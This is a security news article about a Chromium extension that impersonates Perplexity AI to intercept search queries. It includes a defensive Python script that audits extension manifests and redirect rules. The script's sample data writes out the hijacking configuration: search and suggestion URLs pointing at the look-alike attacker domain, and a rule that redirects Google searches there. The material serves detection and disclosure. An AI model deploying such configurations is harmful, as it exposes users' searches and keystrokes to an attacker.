Malicious Chromium Extension Impersonates Perplexity AI to Hijack Search Traffic
A malicious Chromium extension disguised as the AI search engine Perplexity AI has been discovered intercepting user search queries and redirecting traffic through attacker-controlled infrastructure.

Microsoft Threat Intelligence has identified a malicious Chromium-based browser extension that deceives users by impersonating the AI-powered answer engine Perplexity AI. The extension's primary objective appears to be the interception of search traffic and the collection of user data, which could subsequently be used for profiling, targeted advertising, or other malicious purposes. Following responsible disclosure, Microsoft reported the extension to Google, which has since removed it from its store.
Browser extensions remain a significant security risk due to their extensive access to browser APIs, user traffic, and browsing habits. This particular extension, built using Manifest V3, employs intermediary infrastructure and declarativeNetRequest (DNR) rules to discreetly capture Omnibox queries. Unlike traditional search hijackers that often rely on overt redirection, this malicious tool aims to maintain the appearance of legitimate search results while operating covertly.
The threat actor behind this extension is leveraging the growing popularity and perceived legitimacy of AI tools as a social engineering vector. By using branding similar to trusted AI services, they aim to increase installation rates and reduce user suspicion. The extension uses a typosquatted domain, perplexity-ai[.]online, which closely resembles the legitimate Perplexity AI domain (perplexity[.]ai), further increasing the potential for user confusion regarding its authenticity.
Analysis of the extension's manifest file reveals its intent to override default browser search settings. It declares itself as "Perplexity Search" and configures its search_provider to use the attacker-controlled domain for search queries. Crucially, the suggest_url field also routes through this malicious infrastructure, meaning every character typed into the address bar is transmitted to the attacker's servers before any search is performed or redirected.
While the observed behavior confirms the extension's capability to intercept user input and browsing signals, Microsoft's analysis has not yet found definitive evidence of additional objectives such as credential theft. However, the extensive permissions requested by the extension pose significant privacy and security risks to users.
To combat such threats, organizations are advised to enhance user awareness training programs, educating end-users about evolving social engineering tactics that capitalize on emerging trends like AI. A layered security strategy, correlating threat intelligence with behavioral signals, is also recommended.
The extension's manifest configuration includes settings like "search_provider": { "name": "Perplexity Search" } and "search_url": "https://perplexity-ai[.]online/search/{searchTerms}". It also enforces itself as the default search provider using "is_default": true.
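The manifest keys described above (a search_provider override that sets is_default, routes search_url and suggest_url through a look-alike host, and a declarativeNetRequest permission) are all visible in static files, so a defender can audit an extension before or after install without running it. The following Python script is an added example written for this article, not code from Microsoft or from the report: it parses a manifest.json and a static DNR ruleset and flags those indicators. The sample manifest and rule embedded in it are constructed for the example and model the values quoted above; the suggest_url path, the EXPECTED_HOSTS table, and the rule pattern are assumptions, not values taken from the extension.

```python
"""Audit a Chromium extension manifest and DNR ruleset for search hijacking.

Added example, not the extension's code or Microsoft's tooling.  It flags the
patterns the article describes: a chrome_settings_overrides.search_provider
that claims a brand but points search_url / suggest_url elsewhere, forces
itself as default, and a declarativeNetRequest ruleset that redirects
search-engine traffic.  Sample inputs below are constructed.
"""
import json
from urllib.parse import urlparse

# Assumption: brands an extension may plausibly claim, mapped to the hosts
# their real search endpoints use.  Extend this table for your environment.
EXPECTED_HOSTS = {
    "perplexity": {"perplexity.ai", "www.perplexity.ai"},
    "google": {"www.google.com"},
    "bing": {"www.bing.com"},
}

SEARCH_BRANDS = ("google", "bing", "perplexity")


def _refang(url):
    """Turn defanged 'example[.]com' notation back into a parseable URL."""
    return url.replace("[.]", ".")


def _host(url):
    return urlparse(_refang(url)).hostname or ""


def audit_manifest(manifest):
    """Return a list of (severity, message) findings for one manifest dict."""
    findings = []
    perms = set(manifest.get("permissions", []))
    sp = manifest.get("chrome_settings_overrides", {}).get("search_provider")
    if sp:
        name = sp.get("name", "").lower()
        brand = next((b for b in EXPECTED_HOSTS if b in name), None)
        for key in ("search_url", "suggest_url"):
            url = sp.get(key)
            if not url:
                continue
            host = _host(url)
            if brand and host not in EXPECTED_HOSTS[brand]:
                findings.append(("high", f"{key} for '{sp['name']}' points at "
                                         f"{host}, not a known {brand} host"))
        if sp.get("is_default"):
            findings.append(("medium", "extension forces itself as the default "
                                       "search provider"))
        if sp.get("suggest_url"):
            findings.append(("medium", "suggest_url set: every omnibox keystroke "
                                       f"is sent to {_host(sp['suggest_url'])}"))
    if perms & {"declarativeNetRequest", "declarativeNetRequestWithHostAccess"}:
        findings.append(("medium", "declarativeNetRequest permission: extension "
                                   "can rewrite or redirect requests"))
    return findings


def audit_dnr_rules(rules):
    """Flag static declarativeNetRequest rules that redirect search traffic."""
    findings = []
    for rule in rules:
        action = rule.get("action", {})
        cond = rule.get("condition", {})
        if action.get("type") != "redirect":
            continue
        redirect = action.get("redirect", {})
        target = redirect.get("url") or redirect.get("regexSubstitution", "")
        pattern = cond.get("urlFilter") or cond.get("regexFilter", "")
        if any(b in pattern for b in SEARCH_BRANDS):
            findings.append(("high", f"rule {rule.get('id')} redirects {pattern!r} "
                                     f"to {_host(target) or target}"))
    return findings


# Constructed sample manifest modelling the values quoted in the article;
# the suggest_url path is an assumption.
SAMPLE_MANIFEST = json.loads("""
{
  "manifest_version": 3,
  "name": "Perplexity Search",
  "permissions": ["declarativeNetRequest"],
  "host_permissions": ["<all_urls>"],
  "chrome_settings_overrides": {
    "search_provider": {
      "name": "Perplexity Search",
      "keyword": "perplexity",
      "search_url": "https://perplexity-ai[.]online/search/{searchTerms}",
      "suggest_url": "https://perplexity-ai[.]online/suggest?q={searchTerms}",
      "encoding": "UTF-8",
      "is_default": true
    }
  }
}
""")

# Constructed sample DNR rule: a redirect of Google searches of the kind the
# article says the extension was configured for (pattern is an assumption).
SAMPLE_RULES = [
    {"id": 1, "priority": 1,
     "action": {"type": "redirect",
                "redirect": {"regexSubstitution": "https://perplexity-ai.online/search/\\1"}},
     "condition": {"regexFilter": "^https://www\\.google\\.com/search\\?q=([^&]+)",
                   "resourceTypes": ["main_frame"]}},
]

if __name__ == "__main__":
    for sev, msg in audit_manifest(SAMPLE_MANIFEST) + audit_dnr_rules(SAMPLE_RULES):
        print(f"[{sev}] {msg}")
```

Run it against an unpacked extension by loading its manifest.json and the file named under declarative_net_request.rule_resources in place of the constructed samples. Two "high" findings on the manifest (search_url and suggest_url both leave the claimed brand's hosts) plus the redirect rule are the signature the article describes; a benign extension that declares no search_provider override produces no findings.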
This incident underscores the ongoing trend of threat actors exploiting popular technologies and branding to facilitate their attacks. As AI continues to integrate into everyday tools, vigilance against extensions and applications that leverage AI-related branding for malicious purposes becomes increasingly critical.
This new report from The Hacker News details the specific Chrome extension ID, 'flkebkiofojicogddingbdmcmkpbplcd', and the look-alike domain, perplexity-ai[.]online, used by the malicious actor. It also highlights that the extension was configured to potentially redirect searches for Google and Bing, not just Perplexity, and included placeholders for future WebAssembly code execution, indicating a more advanced planned functionality.